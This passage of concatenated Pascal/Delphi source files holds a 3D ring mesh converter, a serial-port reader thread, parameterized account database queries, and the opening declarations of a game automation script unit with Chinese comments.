(_ClassType = TGLDQuadMesh) or (_ClassType = TGLDPolyMesh); end; function TGLDRing.ConvertTo(Dest: TPersistent): GLboolean; begin Result := False; if not Assigned(Dest) then Exit; if Dest.ClassType = Self.ClassType then begin Dest.Assign(Self); Result := True; end else if Dest is TGLDTriMesh then Result := ConvertToTriMesh(Dest) else if Dest is TGLDQuadMesh then Result := ConvertToQuadMesh(Dest) else if Dest is TGLDPolyMesh then Result := ConvertToPolyMesh(Dest); end; {$WARNINGS OFF} function TGLDRing.ConvertToTriMesh(Dest: TPersistent): GLboolean; var M: GLubyte; i, j: GLushort; F: TGLDTriFace; begin Result := False; if not Assigned(Dest) then Exit; if not (Dest is TGLDTriMesh) then Exit; M := GetMode; with TGLDTriMesh(Dest) do begin DeleteVertices; F.Smoothing := GLD_SMOOTH_ALL; if M = 0 then begin VertexCapacity := 1 + FSegments * FSides; AddVertex(GetPoint(1, 1)^, True); for i := 1 to FSegments do for j := 1 to FSides do AddVertex(GetPoint(i + 1, j)^, True); for j := 1 to FSides do begin F.Point1 := 1; F.Point2 := 1 + j; if j = FSides then F.Point3 := 1 + 1 else F.Point3 := 1 + j + 1; AddFace(F); end; if FSegments > 1 then for i := 1 to FSegments - 1 do for j := 1 to FSides do begin F.Point1 := 1 + (i - 1) * FSides + j; F.Point2 := 1 + i * FSides + j; if j = FSides then F.Point3 := 1 + (i - 1) * FSides + 1 else F.Point3 := 1 + (i - 1) * FSides + j + 1; AddFace(F); F.Point2 := 1 + i * FSides + j; if j = FSides then begin F.Point1 := 1 + (i - 1) * FSides + 1; F.Point3 := 1 + i * FSides + 1; end else begin F.Point1 := 1 + (i - 1) * FSides + j + 1; F.Point3 := 1 + i * FSides + j + 1; end; AddFace(F); end; end else //M = 0 if M = 1 then begin VertexCapacity := (FSegments + 1) * FSides; for i := 1 to FSegments + 1 do for j := 1 to FSides do AddVertex(GetPoint(i, j)^, True); for i := 1 to FSegments do for j := 1 to FSides do begin F.Point1 := (i - 1) * FSides + j; F.Point2 := i * FSides + j; if j = FSides then F.Point3 := (i - 1) * FSides + 1 else F.Point3 := (i - 1) * FSides + j + 1; AddFace(F); F.Point2 := i * FSides + j; if j = FSides then begin F.Point1 := (i - 1) * FSides + 1; F.Point3 := i * FSides + 1; end else begin F.Point1 := (i - 1) * FSides + j + 1; F.Point3 := i * FSides + j + 1; end; AddFace(F); end; end else //M = 1 if M = 2 then begin VertexCapacity := 1 + FSegments * (FSides + 1); AddVertex(GetPoint(1, 1)^, True); for i := 1 to FSegments do for j := 1 to FSides + 1 do AddVertex(GetPoint(i + 1, j)^, True); for j := 1 to FSides do begin F.Point1 := 1; F.Point2 := 1 + j; F.Point3 := 1 + j + 1; AddFace(F); end; if FSegments > 1 then for i := 1 to FSegments - 1 do for j := 1 to FSides do begin F.Point1 := 1 + (i - 1) * (FSides + 1) + j; F.Point2 := 1 + i * (FSides + 1) + j; F.Point3 := 1 + (i - 1) * (FSides + 1) + j + 1; AddFace(F); F.Point1 := 1 + (i - 1) * (FSides + 1) + j + 1; F.Point2 := 1 + i * (FSides + 1) + j; F.Point3 := 1 + i * (FSides + 1) + j + 1; AddFace(F); end; end else //M = 2 if M = 3 then begin VertexCapacity := (FSegments + 1) * (FSides + 1); for i := 1 to FSegments + 1 do for j := 1 to FSides + 1 do AddVertex(GetPoint(i, j)^, True); for i := 1 to FSegments do for j := 1 to FSides do begin F.Point1 := (i - 1) * (FSides + 1) + j; F.Point2 := i * (FSides + 1) + j; F.Point3 := (i - 1) * (FSides + 1) + j + 1; AddFace(F); F.Point1 := (i - 1) * (FSides + 1) + j + 1;; F.Point2 := i * (FSides + 1) + j; F.Point3 := i * (FSides + 1) + j + 1;; AddFace(F); end; end; //M = 3 CalcNormals; CalcBoundingBox; PGLDColor4f(Color.GetPointer)^ := Self.FColor.Color4f; PGLDVector4f(Position.GetPointer)^ := Self.FPosition.Vector4f; PGLDRotation3D(Rotation.GetPointer)^ := Self.FRotation.Params; TGLDTriMesh(Dest).Selected := Self.Selected; TGLDTriMesh(Dest).Name := Self.Name; end; //with Result := True; end; function TGLDRing.ConvertToQuadMesh(Dest: TPersistent): GLboolean; var M: GLubyte; i, j: GLushort; F: TGLDQuadFace; begin Result := False; if not Assigned(Dest) then Exit; if not (Dest is TGLDQuadMesh) then Exit; M := GetMode; with TGLDQuadMesh(Dest) do begin DeleteVertices; F.Smoothing := GLD_SMOOTH_ALL; if M = 0 then begin VertexCapacity := 1 + FSegments * FSides; AddVertex(GetPoint(1, 1)^, True); for i := 1 to FSegments do for j := 1 to FSides do AddVertex(GetPoint(i + 1, j)^, True); for j := 1 to FSides do begin F.Point1 := 1; F.Point2 := 1 + j; if j = FSides then F.Point3 := 1 + 1 else F.Point3 := 1 + j + 1; F.Point4 := F.Point1; AddFace(F); end; if FSegments > 1 then for i := 1 to FSegments - 1 do for j := 1 to FSides do begin F.Point1 := 1 + (i - 1) * FSides + j; F.Point2 := 1 + i * FSides + j; if j = FSides then begin F.Point3 := 1 + i * FSides + 1; F.Point4 := 1 + (i - 1) * FSides + 1; end else begin F.Point3 := 1 + i * FSides + j + 1; F.Point4 := 1 + (i - 1) * FSides + j + 1; end; AddFace(F); end; end else //M = 0 if M = 1 then begin VertexCapacity := (FSegments + 1) * FSides; for i := 1 to FSegments + 1 do for j := 1 to FSides do AddVertex(GetPoint(i, j)^, True); for i := 1 to FSegments do for j := 1 to FSides do begin F.Point1 := (i - 1) * FSides + j; F.Point2 := i * FSides + j; if j = FSides then begin F.Point3 := i * FSides + 1; F.Point4 := (i - 1) * FSides + 1; end else begin F.Point3 := i * FSides + j + 1; F.Point4 := (i - 1) * FSides + j + 1; end; AddFace(F); end; end else //M = 1 if M = 2 then begin VertexCapacity := 1 + FSegments * (FSides + 1); AddVertex(GetPoint(1, 1)^, True); for i := 1 to FSegments do for j := 1 to FSides + 1 do AddVertex(GetPoint(i + 1, j)^, True); for j := 1 to FSides do begin F.Point1 := 1; F.Point2 := 1 + j; F.Point3 := 1 + j + 1; F.Point4 := F.Point1; AddFace(F); end; if FSegments > 1 then for i := 1 to FSegments - 1 do for j := 1 to FSides do begin F.Point1 := 1 + (i - 1) * (FSides + 1) + j; F.Point2 := 1 + i * (FSides + 1) + j; F.Point3 := 1 + i * (FSides + 1) + j + 1; F.Point4 := 1 + (i - 1) * (FSides + 1) + j + 1; AddFace(F); end; end else //M = 2 if M = 3 then begin VertexCapacity := FSegments * (FSides + 1); for i := 1 to FSegments + 1 do for j := 1 to FSides + 1 do AddVertex(GetPoint(i, j)^, True); for i := 1 to FSegments do for j := 1 to FSides do begin F.Point1 := (i - 1) * (FSides + 1) + j; F.Point2 := i * (FSides + 1) + j; F.Point3 := i * (FSides + 1) + j + 1; F.Point4 := (i - 1) * (FSides + 1) + j + 1; AddFace(F); end; end; //M = 3 PGLDColor4f(Color.GetPointer)^ := Self.FColor.Color4f; PGLDVector4f(Position.GetPointer)^ := Self.FPosition.Vector4f; PGLDRotation3D(Rotation.GetPointer)^ := Self.FRotation.Params; TGLDQuadMesh(Dest).Selected := Self.Selected; TGLDQuadMesh(Dest).Name := Self.Name; CalcNormals; CalcBoundingBox; end; //with Result := True; end; function TGLDRing.ConvertToPolyMesh(Dest: TPersistent): GLboolean; var M: GLubyte; i, j: GLushort; P: TGLDPolygon; begin Result := False; if not Assigned(Dest) then Exit; if not (Dest is TGLDPolyMesh) then Exit; M := GetMode; with TGLDPolyMesh(Dest) do begin DeleteVertices; if M = 0 then begin VertexCapacity := 1 + FSegments * FSides; AddVertex(GetPoint(1, 1)^, True); for i := 1 to FSegments do for j := 1 to FSides do AddVertex(GetPoint(i + 1, j)^, True); for j := 1 to FSides do begin P := GLD_STD_POLYGON; GLDURealloc(P, 3); P.Data^[1] := 1; P.Data^[2] := 1 + j; if j = FSides then P.Data^[3] := 1 + 1 else P.Data^[3] := 1 + j + 1; //F.Point4 := F.Point1; AddFace(P); end; if FSegments > 1 then for i := 1 to FSegments - 1 do for j := 1 to FSides do begin P := GLD_STD_POLYGON; GLDURealloc(P, 4); P.Data^[1] := 1 + (i - 1) * FSides + j; P.Data^[2] := 1 + i * FSides + j; if j = FSides then begin P.Data^[3] := 1 + i * FSides + 1; P.Data^[4] := 1 + (i - 1) * FSides + 1; end else begin P.Data^[3] := 1 + i * FSides + j + 1; P.Data^[4] := 1 + (i - 1) * FSides + j + 1; end; AddFace(P); end; end else //M = 0 if M = 1 then begin VertexCapacity := (FSegments + 1) * FSides; for i := 1 to FSegments + 1 do for j := 1 to FSides do AddVertex(GetPoint(i, j)^, True); for i := 1 to FSegments do for j := 1 to FSides do begin P := GLD_STD_POLYGON; GLDURealloc(P, 4); P.Data^[1] := (i - 1) * FSides + j; P.Data^[2] := i * FSides + j; if j = FSides then begin P.Data^[3] := i * FSides + 1; P.Data^[4] := (i - 1) * FSides + 1; end else begin P.Data^[3] := i * FSides + j + 1; P.Data^[4] := (i - 1) * FSides + j + 1; end; AddFace(P); end; end else //M = 1 if M = 2 then begin VertexCapacity := 1 + FSegments * (FSides + 1); AddVertex(GetPoint(1, 1)^, True); for i := 1 to FSegments do for j := 1 to FSides + 1 do AddVertex(GetPoint(i + 1, j)^, True); for j := 1 to FSides do begin P := GLD_STD_POLYGON; GLDURealloc(P, 3); P.Data^[1] := 1; P.Data^[2] := 1 + j; P.Data^[3] := 1 + j + 1; // P.Data^[4] := F.Point1; AddFace(P); end; if FSegments > 1 then for i := 1 to FSegments - 1 do for j := 1 to FSides do begin P := GLD_STD_POLYGON; GLDURealloc(P, 4); P.Data^[1] := 1 + (i - 1) * (FSides + 1) + j; P.Data^[2] := 1 + i * (FSides + 1) + j; P.Data^[3] := 1 + i * (FSides + 1) + j + 1; P.Data^[4] := 1 + (i - 1) * (FSides + 1) + j + 1; AddFace(P); end; end else //M = 2 if M = 3 then begin VertexCapacity := FSegments * (FSides + 1); for i := 1 to FSegments + 1 do for j := 1 to FSides + 1 do AddVertex(GetPoint(i, j)^, True); for i := 1 to FSegments do for j := 1 to FSides do begin P := GLD_STD_POLYGON; GLDURealloc(P, 4); P.Data^[1] := (i - 1) * (FSides + 1) + j; P.Data^[2] := i * (FSides + 1) + j; P.Data^[3] := i * (FSides + 1) + j + 1; P.Data^[4] := (i - 1) * (FSides + 1) + j + 1; AddFace(P); end; end; //M = 3 PGLDColor4f(Color.GetPointer)^ := Self.FColor.Color4f; PGLDVector4f(Position.GetPointer)^ := Self.FPosition.Vector4f; PGLDRotation3D(Rotation.GetPointer)^ := Self.FRotation.Params; TGLDPolyMesh(Dest).Selected := Self.Selected; TGLDPolyMesh(Dest).Name := Self.Name; CalcNormals; CalcBoundingBox; end; //with Result := True; end; {$WARNINGS ON} function TGLDRing.GetMode: GLubyte; begin if GLDXGetAngle(FStartAngle, FSweepAngle) = 360 then begin if InnerRadius = 0 then Result := 0 else Result := 1; end else begin if InnerRadius = 0 then Result := 2 else Result := 3; end; end; function TGLDRing.GetPoint(i, j: GLushort): PGLDVector3f; begin Result := @FPoints^[(i - 1) * (FSides + 3) + j + 1]; end; function TGLDRing.GetNormal(i, j: GLushort): PGLDVector3f; begin Result := @FNormals^[(i - 1) * (FSides + 3) + j + 1]; end; procedure TGLDRing.SetInnerRadius(Value: GLfloat); begin if FInnerRadius = Value then Exit; FInnerRadius := Value; CreateGeometry; Change; end; procedure TGLDRing.SetOuterRadius(Value: GLfloat); begin if FOuterRadius = Value then Exit; FOuterRadius := Value; CreateGeometry; Change; end; procedure TGLDRing.SetSegments(Value: GLushort); begin if FSegments = Value then Exit; FSegments := Value; CreateGeometry; Change; end; procedure TGLDRing.SetSides(Value: GLushort); begin if FSides = Value then Exit; FSides := Value; CreateGeometry; Change; end; procedure TGLDRing.SetStartAngle(Value: GLfloat); begin if FStartAngle = Value then Exit; FStartAngle := Value; CreateGeometry; Change; end; procedure TGLDRing.SetSweepAngle(Value: GLfloat); begin if FSweepAngle = Value then Exit; FSweepAngle := Value; CreateGeometry; Change; end; function TGLDRing.GetParams: TGLDRingParams; begin Result := GLDXRingParams(FColor.Color3ub, FInnerRadius, FOuterRadius, FSegments, FSides, FStartAngle, FSweepAngle, FPosition.Vector3f, FRotation.Params); end; procedure TGLDRing.SetParams(Value: TGLDRingParams); begin if GLDXRingParamsEqual(GetParams, Value) then Exit; PGLDColor3f(FColor.GetPointer)^ := GLDXColor3f(Value.Color); FInnerRadius := Value.InnerRadius; FOuterRadius := Value.OuterRadius; FSegments := Value.Segments; FSides := Value.Sides; FStartAngle := Value.StartAngle; FSweepAngle := Value.SweepAngle; PGLDVector3f(FPosition.GetPointer)^ := Value.Position; PGLDRotation3D(FRotation.GetPointer)^ := Value.Rotation; CreateGeometry; Change; end; end.
unit Serial3Comms; {$mode objfpc}{$H+} interface uses Classes, Platform, GlobalConst, Serial; const SERIAL_3_RECORD_SIZE = 76; type TConf = record coBaudRate, coParity, coDataBits, coStopBits, coFlowControl : LongWord; end; type TComPortReadThread=class(TThread) private FActive: boolean; FConfi : TConf; FRecordSize : Longword; FRecordBufferP : pchar; FDeviceCloseRequested : boolean; FBytesRead : Longword; FUpdateBufferP : pchar; FFirstMessageSent : Boolean; procedure DeviceOpen; procedure DeviceClose; procedure ReadData; public MustDie: boolean; procedure Open; procedure Close; function DataAvailable: boolean; function ReadChar: Char; function WriteData(data: string): integer; function WriteBuffer(var buf; size: integer): integer; procedure Config(cBaudRate : LongWord; cParity : Char; cDataBits : LongWord; cStopBits : LongWord; cFlowControl : LongWord); virtual; constructor Create(RecordSize : Integer; CreateSuspended: Boolean); protected procedure Execute; override; procedure OnRecordAvailable(recP : pointer); virtual; procedure OnConnectionEstablished; virtual; procedure SetActive(state: boolean); procedure RequestDeviceClose; published property Terminated; property Active: boolean read FActive write SetActive; property IsReceivingData : boolean read FFirstMessageSent; end; implementation procedure TComPortReadThread.Close; begin Active:=false; end; procedure TComPortReadThread.DeviceClose; begin SerialClose; end; function TComPortReadThread.DataAvailable: boolean; begin result:=SerialAvailable; end; procedure TComPortReadThread.Open; begin Active:=true; end; procedure TComPortReadThread.Config(cBaudRate : LongWord; cParity : Char; cDataBits : LongWord; cStopBits : LongWord; cFlowControl : LongWord); begin FConfi.coBaudRate := cBaudRate; FConfi.coParity := SERIAL_PARITY_NONE; case cParity of 'N', 'n': FConfi.coParity := SERIAL_PARITY_NONE; 'O', 'o': FConfi.coParity := SERIAL_PARITY_ODD; 'E', 'e': FConfi.coParity := SERIAL_PARITY_EVEN; 'M', 'm': FConfi.coParity := SERIAL_PARITY_MARK; 'S', 's': FConfi.coParity := SERIAL_PARITY_SPACE; end; FConfi.coDataBits := SERIAL_DATA_8BIT; case cDataBits of 7: FConfi.coDataBits := SERIAL_DATA_7BIT; 6: FConfi.coDataBits := SERIAL_DATA_6BIT; 5: FConfi.coDataBits := SERIAL_DATA_5BIT; end; FConfi.coStopBits := SERIAL_STOP_1BIT; case cStopBits of 2: FConfi.coStopBits := SERIAL_STOP_2BIT; 15: FConfi.coStopBits := SERIAL_STOP_1BIT5; end; FConfi.coFlowControl := SERIAL_FLOW_NONE; case cFlowControl of 0: FConfi.coFlowControl := SERIAL_FLOW_NONE; 1: FConfi.coFlowControl := SERIAL_FLOW_RTS_CTS; 2: FConfi.coFlowControl := SERIAL_FLOW_DSR_DTR; end; end; procedure TComPortReadThread.DeviceOpen; begin SerialOpen(FConfi.coBaudRate,FConfi.coDataBits,FConfi.coStopBits,FConfi.coParity,FConfi.coFlowControl,0,0); end; procedure TComPortReadThread.OnConnectionEstablished; begin end; function TComPortReadThread.ReadChar: Char; var uCharac : Char; Count1 : LongWord; begin Count1:=0; SerialRead(@uCharac,SizeOf(uCharac),Count1); result:=uCharac; end; procedure TComPortReadThread.ReadData; var ResultCode : integer; Count : LongWord = 0; begin ResultCode:=SerialDeviceRead(SerialDeviceGetDefault,FUpdateBufferP, FRecordSize - FBytesRead,SERIAL_READ_NON_BLOCK, Count); if (Count > 0) then begin FBytesRead := FBytesRead + Count; FUpdateBufferP := FUpdateBufferP + Count; end; end; procedure TComPortReadThread.SetActive(state: boolean); begin if state=FActive then exit; if state then DeviceOpen else DeviceClose; FActive:=state; end; function TComPortReadThread.WriteBuffer(var buf; size: integer): integer; var Count2 : Longword; begin Count2 := 0; SerialWrite(Pointer(@buf), size, Count2); result := Count2; end; function TComPortReadThread.WriteData(data: string): integer; var Count3 : Longword; begin Count3 := 0; SerialWrite(PChar(data),Length(data),Count3); result := Count3; end; constructor TComPortReadThread.Create(RecordSize : Integer; CreateSuspended : boolean); begin inherited Create(CreateSuspended); FActive := False; FRecordSize := RecordSize; FBytesRead := 0; FRecordBufferP := Getmem(FRecordSize); FUpdateBufferP := FRecordBufferP; FFirstMessageSent := False; FDeviceCloseRequested := False; FConfi.coBaudRate := 9600; FConfi.coParity := SERIAL_PARITY_NONE; FConfi.coDataBits := SERIAL_DATA_8BIT; FConfi.coStopBits := SERIAL_STOP_1BIT; FConfi.coFlowControl := SERIAL_FLOW_NONE; end; procedure TComPortReadThread.Execute; begin try while not Terminated do begin if (Active) then begin ReadData; if (FBytesRead = FRecordSize) then begin if (not FFirstMessageSent) then begin OnConnectionEstablished; FFirstMessageSent := True; end; OnRecordAvailable(FRecordBufferP); FBytesRead := 0; FUpdateBufferP := FRecordBufferP; end; if (FDeviceCloseRequested) then begin Active := False; FDeviceCloseRequested := False; end; end; sleep(10); end; finally Active := False; FreeMem(FRecordBufferP); Terminate; end; end; procedure TComPortReadThread.OnRecordAvailable(recP : pointer); begin end; procedure TComPortReadThread.RequestDeviceClose; begin FDeviceCloseRequested := True; end; end.
//------------------------------------------------------------------------------ //AccountQueries UNIT //------------------------------------------------------------------------------ // What it does- // Account related database routines // // Changes - // February 11th, 2008 // //------------------------------------------------------------------------------ unit AccountQueries; {$IFDEF FPC} {$MODE Delphi} {$ENDIF} interface uses {RTL/VCL} {Project} Account, QueryBase, {3rd Party} ZSqlUpdate ; type //------------------------------------------------------------------------------ //TAccountQueries CLASS //------------------------------------------------------------------------------ TAccountQueries = class(TQueryBase) protected public Function Exists( const AnAccount : TAccount ) : Boolean; Procedure Load( const AnAccount : TAccount ); Procedure Save( const AnAccount : TAccount ); Procedure New( const AnAccount : TAccount ); procedure Refresh( const AnAccount : TAccount ); end; //------------------------------------------------------------------------------ implementation uses {RTL/VCL} SysUtils, {Project} {3rd Party} ZDataset, DB //none ; //------------------------------------------------------------------------------ //Load PROCEDURE //------------------------------------------------------------------------------ // What it does- // Loads an account // // Changes - // February 11th, 2008 - RaX - Created. // //------------------------------------------------------------------------------ Procedure TAccountQueries.Load( const AnAccount : TAccount ); const AQuery = 'SELECT id, name, password, last_login, login_count, gender, email_address, '+ 'login_key_1, login_key_2, level, connect_until, banned_until, last_ip, state'+ ' FROM accounts'; var WhereClause : String; ADataSet : TZQuery; AParam : TParam; begin if AnAccount.ID > 0 then begin WhereClause := ' WHERE id=:ID;'; end else begin WhereClause := ' WHERE name=:Name;' end; ADataSet := TZQuery.Create(nil); //ID AParam := ADataset.Params.CreateParam(ftInteger, 'ID', ptInput); AParam.AsInteger := AnAccount.ID; ADataSet.Params.AddParam( AParam ); //Name AParam := ADataset.Params.CreateParam(ftString, 'Name', ptInput); AParam.AsString := AnAccount.Name; ADataSet.Params.AddParam( AParam ); // try Query(ADataSet, AQuery+WhereClause); ADataSet.First; if NOT ADataSet.Eof then begin //fill character data AnAccount.ID := ADataSet.Fields[0].AsInteger; AnAccount.Name := ADataSet.Fields[1].AsString; AnAccount.Password := ADataSet.Fields[2].AsString; //Tsusai - For Gender, we need to return the first char, thats //why there is a [1] AnAccount.LastLoginTime := ADataSet.Fields[3].AsDateTime; AnAccount.LoginCount := ADataSet.Fields[4].AsInteger; AnAccount.Gender := (ADataSet.Fields[5].AsString)[1]; AnAccount.EMail := ADataSet.Fields[6].AsString; AnAccount.LoginKey[1] := ADataSet.Fields[7].AsInteger; AnAccount.LoginKey[2] := ADataSet.Fields[8].AsInteger; AnAccount.Level := ADataSet.Fields[9].AsInteger; AnAccount.ConnectUntil := ADataSet.Fields[10].AsDateTime; AnAccount.BannedUntil := ADataSet.Fields[11].AsDateTime; AnAccount.LastIP := ADataSet.Fields[12].AsString; AnAccount.State := ADataSet.Fields[13].AsInteger; end; finally ADataSet.Free; end; Inherited; end;//Load //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ //Exists PROCEDURE //------------------------------------------------------------------------------ // What it does- // Checks to see if an account exists // // Changes - // February 11th, 2008 - RaX - Created. // //------------------------------------------------------------------------------ Function TAccountQueries.Exists( const AnAccount : TAccount ) : Boolean; const AQuery = 'SELECT id FROM accounts'; var WhereClause : String; ADataSet : TZQuery; AParam : TParam; begin Result := TRUE; if AnAccount.ID > 0 then begin WhereClause := ' WHERE id=:ID'; end else begin WhereClause := ' WHERE name=:Name' end; ADataSet := TZQuery.Create(nil); //ID AParam := ADataset.Params.CreateParam(ftInteger, 'ID', ptInput); AParam.AsInteger := AnAccount.ID; ADataSet.Params.AddParam( AParam ); //Name AParam := ADataset.Params.CreateParam(ftString, 'Name', ptInput); AParam.AsString := AnAccount.Name; ADataSet.Params.AddParam( AParam ); try Query(ADataSet, AQuery+WhereClause); ADataset.First; if ADataSet.Eof then begin Result := FALSE; end; finally ADataSet.Free; end; end;//Exists //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ //Save PROCEDURE //------------------------------------------------------------------------------ // What it does- // Save an account. // // Changes - // February 12th, 2008 - RaX - Created. // //------------------------------------------------------------------------------ procedure TAccountQueries.Save( const AnAccount : TAccount ); const AQuery = 'UPDATE accounts SET '+ 'name=:Name ,' + 'password=:Password , ' + 'last_login=:LastLogin , ' + 'gender=:Gender , ' + 'login_count=:LoginCount , ' + 'email_address=:EmailAddress , ' + 'login_key_1=:LoginKey1 , ' + 'login_key_2=:LoginKey2 , ' + 'connect_until=:ConnectUntil , ' + 'banned_until=:BannedUntil , ' + 'last_ip=:LastIp, ' + 'state=:State ' + 'WHERE id=:ID;'; var ADataSet : TZQuery; AParam : TParam; begin ADataSet := TZQuery.Create(nil); //ID AParam := ADataset.Params.CreateParam(ftInteger, 'ID', ptInput); AParam.AsInteger := AnAccount.ID; ADataSet.Params.AddParam( AParam ); //Name AParam := ADataset.Params.CreateParam(ftString, 'Name', ptInput); AParam.AsString := AnAccount.Name; ADataSet.Params.AddParam( AParam ); //Password AParam := ADataset.Params.CreateParam(ftString, 'Password', ptInput); AParam.AsString := AnAccount.Password; ADataSet.Params.AddParam( AParam ); //LastLogin AParam := ADataset.Params.CreateParam(ftTimestamp, 'LastLogin', ptInput); AParam.AsString := FormatDateTime('yyyy-mm-dd hh:mm:ss',AnAccount.LastLoginTime); ADataSet.Params.AddParam( AParam ); //Gender AParam := ADataset.Params.CreateParam(ftString, 'Gender', ptInput); AParam.AsString := AnAccount.Gender; ADataSet.Params.AddParam( AParam ); //LoginCount AParam := ADataset.Params.CreateParam(ftInteger, 'LoginCount', ptInput); AParam.AsInteger := AnAccount.LoginCount; ADataSet.Params.AddParam( AParam ); //EmailAddress AParam := ADataset.Params.CreateParam(ftString, 'EmailAddress', ptInput); AParam.AsString := AnAccount.EMail; ADataSet.Params.AddParam( AParam ); //LoginKey1 AParam := ADataset.Params.CreateParam(ftInteger, 'LoginKey1', ptInput); AParam.AsInteger := AnAccount.LoginKey[1]; ADataSet.Params.AddParam( AParam ); //LoginKey2 AParam := ADataset.Params.CreateParam(ftInteger, 'LoginKey2', ptInput); AParam.AsInteger := AnAccount.LoginKey[2]; ADataSet.Params.AddParam( AParam ); //ConnectUntil AParam := ADataset.Params.CreateParam(ftTimestamp, 'ConnectUntil', ptInput); AParam.AsString := FormatDateTime('yyyy-mm-dd hh:mm:ss',AnAccount.ConnectUntil); ADataSet.Params.AddParam( AParam ); //BannedUntil AParam := ADataset.Params.CreateParam(ftTimestamp, 'BannedUntil', ptInput); AParam.AsString := FormatDateTime('yyyy-mm-dd hh:mm:ss',AnAccount.BannedUntil); ADataSet.Params.AddParam( AParam ); //LastIp AParam := ADataset.Params.CreateParam(ftString, 'LastIp', ptInput); AParam.AsString := AnAccount.LastIP; ADataSet.Params.AddParam( AParam ); //State AParam := ADataset.Params.CreateParam(ftInteger, 'State', ptInput); AParam.AsInteger := AnAccount.State; ADataSet.Params.AddParam( AParam ); try QueryNoResult(ADataSet, AQuery); finally ADataSet.Free; end; end;//Save //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ //New PROCEDURE //------------------------------------------------------------------------------ // What it does- // Creates an account. // // Changes - // February 12th, 2008 - RaX - Created. // //------------------------------------------------------------------------------ procedure TAccountQueries.New( const AnAccount : TAccount ); const AQuery = 'INSERT INTO accounts '+ '(name, password, gender, storage_id) '+ 'VALUES'+ '(:Name , :Password, :Gender, :StorageID);'; var ADataSet : TZQuery; AParam : TParam; begin ADataSet := TZQuery.Create(nil); //Name AParam := ADataset.Params.CreateParam(ftString, 'Name', ptInput); AParam.AsString := AnAccount.Name; ADataSet.Params.AddParam( AParam ); //Password AParam := ADataset.Params.CreateParam(ftString, 'Password', ptInput); AParam.AsString := AnAccount.Password; ADataSet.Params.AddParam( AParam ); //Gender AParam := ADataset.Params.CreateParam(ftString, 'Gender', ptInput); AParam.AsString := AnAccount.Gender; ADataSet.Params.AddParam( AParam ); //StorageID AParam := ADataset.Params.CreateParam(ftInteger, 'StorageID', ptInput); AParam.AsInteger := AnAccount.StorageID; ADataSet.Params.AddParam( AParam ); try QueryNoResult(ADataSet, AQuery); finally ADataSet.Free; end; end;//New //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ //Refresh Procedure //------------------------------------------------------------------------------ // What it does- // Refreshes some account data // // Changes - // February 12th, 2008 - RaX - Created. // //------------------------------------------------------------------------------ procedure TAccountQueries.Refresh( const AnAccount : TAccount ); const AQuery = 'SELECT login_key_1, login_key_2, connect_until, banned_until '+ 'FROM accounts WHERE id=:ID'; var ADataSet : TZQuery; AParam : TParam; begin ADataSet := TZQuery.Create(nil); try //ID AParam := ADataset.Params.CreateParam(ftInteger, 'ID', ptInput); AParam.AsInteger := AnAccount.ID; ADataSet.Params.AddParam( AParam ); Query(ADataSet, AQuery); ADataSet.First; if NOT ADataSet.Eof then begin AnAccount.LoginKey[1] := ADataSet.Fields[0].AsInteger; AnAccount.LoginKey[2] := ADataSet.Fields[1].AsInteger; AnAccount.ConnectUntil := ADataSet.Fields[2].AsDateTime; AnAccount.BannedUntil := ADataSet.Fields[3].AsDateTime; end; finally ADataSet.Free; end; end;//Refresh //------------------------------------------------------------------------------ end.
unit UnitClasses; interface Uses Windows, SysUtils, Classes, IniFiles, Messages, Contnrs, UnitTypesAndVars, UnitConsts, ClsMaps, ClsGames, Math, UnitGeneralSet; Type // 步骤信息 { TStep = Class public Action: Integer; X: String; Y: String; Z: String; SubStepIndex: integer; CalledNPCID: TNPCID; constructor Create(tmpAct: Integer = ActUnknown; tmpX: String = ''; tmpY: String = ''; tmpZ: String = ''); end; } // 事务信息 TTransaction = Class // 做一系列步骤 Private FCaption: WideString; // 这一步叫什么名字 FID: integer; // 在Workini中的定位 Purposes: TList; FOldTime: LongWord; StepList: TList; StepCount: Integer; // 一共有多少个Step Public StepIndex: integer; IsWorking: Boolean; PosX: DWORD; PosY: DWORD; OldNPCDialog: WideString; State: Integer; // 0-还没有检查,1-OK,-1为不行 constructor Create; property Caption: WideString read FCaption; constructor Create(tmpID: integer = -1; tmpCaption: String = ''); overload; destructor Destroy; override; procedure SetOldTime; procedure ClearOldTime; function HasPassedInterval(MilliSecond: LongWord): Boolean; procedure TryReadDetails(const vIniFileName: WideString); function IsPurposeSatisfied: Boolean; procedure AddStep(tmpAction: Integer; tmpX, tmpY, tmpZ: String); procedure InsertStep(tmpAction: Integer; tmpX, tmpY, tmpZ: String; pos: Integer); function GetCurrStep: TStepInfo; procedure Init; function IsFinish: Boolean; procedure GotoNextStep; function AddPurpose: PurposeInfo; procedure PurseSteps(tmpStringList: TStringList); end; // 工作 TWork = Class(TObjectList) Private // TransactionList: TList; //FTransactionIndex: Integer; // 当前事务编号{此Step不是StepInfo的含义} FIniFileName: WideString; // 脚本文件 FRepeatCount: Integer; function GetItem(Index: Integer): TTransaction; procedure SetItem(Index: Integer; const Value: TTransaction); // 预计循环数 Public FTransactionIndex: Integer; // 当前事务编号{此Step不是StepInfo的含义} CanWork: Boolean; IsFirstTime: Boolean; // 是否第一次工作 RepeatCounter: Integer; // TransactionCount: integer; property IniFileName: WideString read FIniFileName write FIniFileName; // 脚本文件 property Items[Index: Integer]: TTransaction read GetItem write SetItem; default; property RepeatCount: Integer read FRepeatCount; // 预计循环数 function AddTransaction(const Caption: String = ''): TTransaction; procedure DeleteTransaction(Index: integer); procedure Clean; constructor Create; destructor Destroy; override; function GetSize: Integer; function GetCurrTransaction: TTransaction; function GetNextTransToDo: Boolean; function GetTransactionByIndex(Index: integer): TTransaction; procedure GotoNextTrans; procedure GotoTrans(ToIndex: integer; IsClearState: Boolean=False); function IsFinish: Boolean; // 检测工作是否完成 function ReadIni: Boolean; end; // 原料 TBuyStuff = class Public function InitShop: Boolean; // 返回值为False的时候,表明Shop有些窗口没有找到 function IsSatisfied: Boolean; procedure WriteStuffInfo(Name, Maker: String; Count: integer); procedure GetAllStuffCount; procedure PatchShop; procedure UnPatchShop; function DoBuyStuff: Boolean; function HasBoughtStuff: Boolean; Private hwndShop: HWND; hwndItemList: HWND; hwndBuy: HWND; StuffName: String; StuffMaker: String; StuffCount: integer; OldAllStuffCount: integer; end; // 战斗 TBattle = Class Public OrderHumanAction: integer; // 预先下的指令,在战斗过程中不会变化 OrderPetAction: integer; EscapeWhenNoMonsterToCapture: Boolean; // 